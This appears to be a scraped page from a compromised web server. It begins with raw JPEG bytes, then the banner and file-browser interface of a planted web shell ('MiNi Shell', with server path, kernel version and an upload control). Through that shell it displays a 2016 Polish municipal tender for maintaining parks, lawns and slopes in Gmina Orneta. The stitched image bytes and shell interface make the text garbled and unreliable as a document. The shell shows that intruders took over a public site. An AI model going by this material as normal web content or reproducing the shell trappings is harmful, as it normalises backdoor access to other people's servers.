JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160218/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160218/36642-N-2016.html

<p class="kh_header"><b>Orneta: Zakładanie, bieżące utrzymanie i pielęgnacja zieleni miejskiej na terenie Gminy Orneta w roku 2016 
Część 1: Zadanie 1. Parki, skwery, kwietniki, trawniki 
Część 2: Zadanie 2. Skarpy, tereny zieleni nie urządzonej</b><br>
<b>Numer ogłoszenia: 36642 - 2016; data zamieszczenia: 18.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orneta.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakładanie, bieżące utrzymanie i pielęgnacja zieleni miejskiej na terenie Gminy Orneta w roku 2016 
Część 1: Zadanie 1. Parki, skwery, kwietniki, trawniki 
Część 2: Zadanie 2. Skarpy, tereny zieleni nie urządzonej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Określenie przedmiotu zamówienia: 
1)Przedmiotem zamówienia jest zakładanie, bieżące utrzymanie i pielęgnacja zieleni miejskiej na terenie Gminy Orneta w roku 2016. 
Przedmiot zamówienia został podzielony na dwie części. 
Część 1: Zadanie 1. Parki, skwery, kwietniki, trawniki 
Część 2: Zadanie 2. Skarpy, tereny zieleni nie urządzonej 
2)Zamawiający dopuszcza możliwość składania ofert częściowych na dowolną liczbę wybranych przez Wykonawcę części przedmiotu zamówienia. 
3)Warunki składania ofert częściowych zostały określone w § 18 IDW Rozdziału I SIWZ 
2. Zakres zamówienia dla Części 1 i 2 przedmiotu zamówienia został przedstawiony w załączniku I Informacje na temat ofert częściowych niniejszego ogłoszenia. 
3. Szczegółowy opis i zakres przedmiotu zamówienia dla Części 1 i 2 przedmiotu zamówienia został przedstawiony w Rozdziale III SIWZ...</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp . 
Wielkość zamówienia uzupełniającego do 50 % wartości zamówienia podstawowego. w zakresie zakładania, bieżącego utrzymania i pielęgnacji zieleni miejskiej na terenie Gminy Orneta.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6, 77.31.30.00-7, 77.31.30.00-5, 77.34.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1 i 2 przedmiotu zamówienia Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW 
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj. 
- oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  wykaże, że:  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy  w tym okresie wykonał należycie lub w przypadku świadczeń okresowych i ciągłych wykonuje   należycie co najmniej:
a) dla Części 1 przedmiotu zamówienia
-   1 usługę  polegającą na utrzymaniu  zieleni w sposób ciągły przez okres co najmniej 6 m-cy w ciągu 1 roku kalendarzowego (jeżeli okres działalności jest krótszy to w tym okresie),  której  zrealizowana wartość brutto usługi w tym okresie wynosi co  najmniej 50 000 zł  i  zrealizowany zakres usługi obejmował co najmniej bieżące  utrzymanie i  pielęgnację   roślin  ozdobnych, trawników. 
Uwaga: Przez rośliny ozdobne należy rozumieć  jednoroczne, dwuletnie lub wieloletnie 
rośliny a  także drzewa i krzewy o dużych walorach dekoracyjnych.
b) dla Części 2 przedmiotu zamówienia:   
 -  1 usługę polegającą na  koszeniu terenów zielonych i/lub trawników w sposób ciągły przez okres co najmniej 4 m-cy w ciągu 1 roku kalendarzowego (jeżeli okres działalności jest krótszy to w tym okresie), i wartość brutto zrealizowanego w tym okresie koszenia terenów zielonych  i/lub trawników  wynosi co najmniej 15 000 zł
Ocena spełnienia warunku  nastąpi na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych  w  § 6 ust. 1 pkt 1 i 2 IDW tj 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ
-  wykazu wykonanych, a  w przypadku świadczeń okresowych lub ciągłych również  
wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie, wraz z podaniem ich  przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane  sporządzonego wg załącznika nr 5 do IDW, oraz załączeniem dowodów, czy  zostały  wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1 i 2 przedmiotu zamówienia Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW 
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj. 
- oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1 i 2 przedmiotu zamówienia Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW 
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj. 
- oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1 i 2 przedmiotu zamówienia Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW 
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj. 
- oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca wskazuje w wykazie usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia opisanego w § 5 ust.2 pkt 2 IDW;;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)   Formularz oferty sporządzony wg Załącznika nr 1 do IDW Rozdziału II SIWZ
2)   Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie   wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru, a w przypadku  Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument  ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia   albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia    publicznego ( jeżeli dana sytuacja dotyczy wykonawcy) 
3)   Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć 
podwykonawcom  według załącznika nr 6 do IDW Rozdziału II SIWZ
4)   Zastrzeżenie informacji stanowiących tajemnicę przedsiębiorstwa  w rozumieniu przepisów o  zwalczaniu nieuczciwej konkurencji  sporządzone wg załącznika nr 7 do IDW Rozdziału II SIWZ
5)  Formularz cenowy opracowany zgodnie z § 12 IDW wg załącznika nr 2 do IDW Rozdziału II SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość dokonania czynności  prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia  publicznego w stosunku  do treści oferty, na podstawie której dokonano wyboru  Wykonawcy. 
2. Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian   zawartej umowy:
1)   konieczność skrócenia terminu umownego zakończenia realizacji przedmiotu Umowy  w określonego  w § 2 ust. 1 pkt 2 umowy w przypadku wcześniejszego wyczerpania kwoty maksymalnego wynagrodzenia  Wykonawcy o którym  mowa  w § 7 ust. 1  Umowy bez prawa Wykonawcy do dochodzenia z tego tytułu  jakichkolwiek roszczeń.    
Powyższa zmiana (skrócenie) terminu zakończenia realizacji przedmiotu Umowy nie  
spowoduje żadnych sankcji finansowych z tytułu wcześniejszego  rozwiązania umowy na realizację przedmiotu Umowy. Wykonawcy nie przysługuje z tego tytułu prawo dochodzenia kar, odszkodowań lub innych należności.
2)   zmianę ilościowego zakresu rzeczowego przedmiotu zamówienia w zakresie poszczególnych  pozycji ujętych w załączniku nr 1 i załączniku nr 2 do Opisu przedmiotu zamówienia Rozdziału III SIWZ (podyktowanego faktycznymi potrzebami wykonania poszczególnych usług) max do wysokości wartości brutto umowy i przy zachowaniu wartości jednostkowych przedstawionych przez Wykonawcę w formularzu cenowym  w zakresie:  
a)	zmniejszenia ilości zakresu rzeczowego przedmiotu Umowy  w  szczególności w 
związku:
a.	z remontem, przebudową, rozbudową  powierzchni terenów zielonych przeznaczonych do utrzymania i związanych z tym wyłączeń z utrzymania, 
b.	z mniejszą ilością zakresu rzeczowego faktycznie realizowanego z zastrzeżeniem  zapisów Załącznika nr 1 i 2 do Opisu przedmiotu zamówienia Rozdziału III SIWZ, 
c.	z wyłączeniem z zakresu rzeczowego w części lub w całości zakresu rzeczowego wymienionego w Opisie przedmiotu zamówienia załącznik nr 1 ust. 3 Pielęgnacja trawników pkt  2 - 4  w przypadku zatrudnienia przez Zamawiającego osób bezrobotnych w ramach robót publicznych lub prac interwencyjnych i podjęcia decyzji o realizacji tego  zakresu rzeczowego sposobem  gospodarczym
d.	z koniecznością wykonania mniejszej liczby koszeń spowodowaną warunkami  
atmosferycznymi.
b)	zwiększenia ilości zakresu rzeczowego przedmiotu Umowy w   szczególności w 
związku:
a.	z większą ilością zakresu rzeczowego faktycznie realizowanego z zastrzeżeniem   
zapisów Załącznika nr 1 i 2 do Opisu przedmiotu zamówienia Rozdziału III SIWZ, 
b.	z koniecznością wykonania większej liczby koszeń spowodowaną warunkami  
atmosferycznymi.
Powyższa zmiana ilościowego zakresu rzeczowego przedmiotu Umowy nie  spowoduje 
zmiany wartości jednostkowych netto określonych w formularzu cenowym oraz żadnych innych sankcji finansowych dla Zamawiającego z tytułu zmiany ilościowego  zakresu rzeczowego przedmiotu Umowy.
3)   zmianę wynagrodzenia wykonawcy w przypadku:
a)	zmiany ilościowego zakresu rzeczowego przedmiotu Umowy (zmniejszenia lub zwiększenia w ilościach zakresu rzeczowego przedmiotu Umowy)  o  którym mowa  w pkt 2 ppkt. 2)  lit. a) i b)
b)	zmiany ustawowej stawki podatku VAT
4)   wprowadzenia zmian w stosunku do Opisu Przedmiotu Zamówienia Rozdziału III SIWZ w zakresie wykonania usług nie wykraczających poza zakres przedmiotu Umowy, w sytuacji  konieczności zwiększenia usprawnienia procesu realizacji zamówienia,
5)   zmianę w zatrudnieniu podwykonawców w przypadku, gdy Wykonawca oświadczył, iż wykona  umowę osobiście w zakresie zgodnym ze SIWZ oraz zmiany osobowej    podwykonawców oraz  zakresu podwykonawstwa, 
6)   oznaczenie stron umowy, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo zamówień  publicznych następstwa prawnego albo zmiany nazwy lub innego oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem czynności powodujących taką zmianę.
7)	powstanie rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie  będzie  można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony; 
8)	konieczność wprowadzenia  zmian  wynika z okoliczności, których nie można było  przewidzieć w  chwili zawarcia umowy, a są one korzystne dla zamawiającego      
          
3. Niezależnie od powyższych zmian, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych stron ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu Umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu Umowy bądź zwiększających użyteczność przedmiotu Umowy. W takiej sytuacji, Zamawiający i Wykonawca wprowadzą do Umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe jego brzmienie bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu Umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> orneta-umig.bip-um.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Stanowisko d/s Zamówień publicznych (budynek Ratusza pok. Nr 11)...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.02.2016 godzina 11:30, miejsce: Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Sekretariat pok. nr 3....</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia wykonawcę, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1. Parki, skwery, kwietniki, trawniki....</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia dla Części 1 przedmiotu zamówienia obejmuje : 
1.  Zakładanie bieżące utrzymanie zieleni miejskiej polegające na:
1)Całorocznej pielęgnacji kwietników obsadzonych różami rabatowymi ok. 132 szt
2)Całorocznej pielęgnacji krzewów i drzew ozdobnych liściastych ok. 679 szt  
3)Całorocznej pielęgnacji żywopłotów ok. 206 mb
4)Całorocznej pielęgnacji krzewów i drzew iglastych ok. 47 szt
5)Całorocznej pielęgnacji gazonów i kwietników oraz skwerków i rond obsadzonych 
roślinami  jednorocznymi,  wieloletnimi i bylinami
2.   Pielęgnacja alejek, rabat kwiatowych, dywanów kwiatowych i trawników w parkach i na skwerkach
1)Park k/MDK, 
2)Skwer ul. Zamkowa - Litewska wraz z utrzymaniem w czystości alejek utwardzonych, ławek i koszy na śmieci, 
3)Teren zieleni urządzonej ul. 1-go Maja 70
4)Park ul. 1-go Maja im. Henryka Dobosza wraz z utrzymaniem w czystości alejek 
utwardzonych, ławek i koszy na śmieci
5)Park ul. Mickiewicza im. Ks. Kan. Jana Szulborskiego wraz z utrzymaniem w czystości alejek  utwardzonych, fontanny,  ławek , koszy na śmieci
6)Teren zieleni urządzonej - parking Krosno z terenami przyległymi wraz z utrzymaniem w   czystości parkingu i dróg o nawierzchni z kostki Starobruk,  koszy na śmieci 
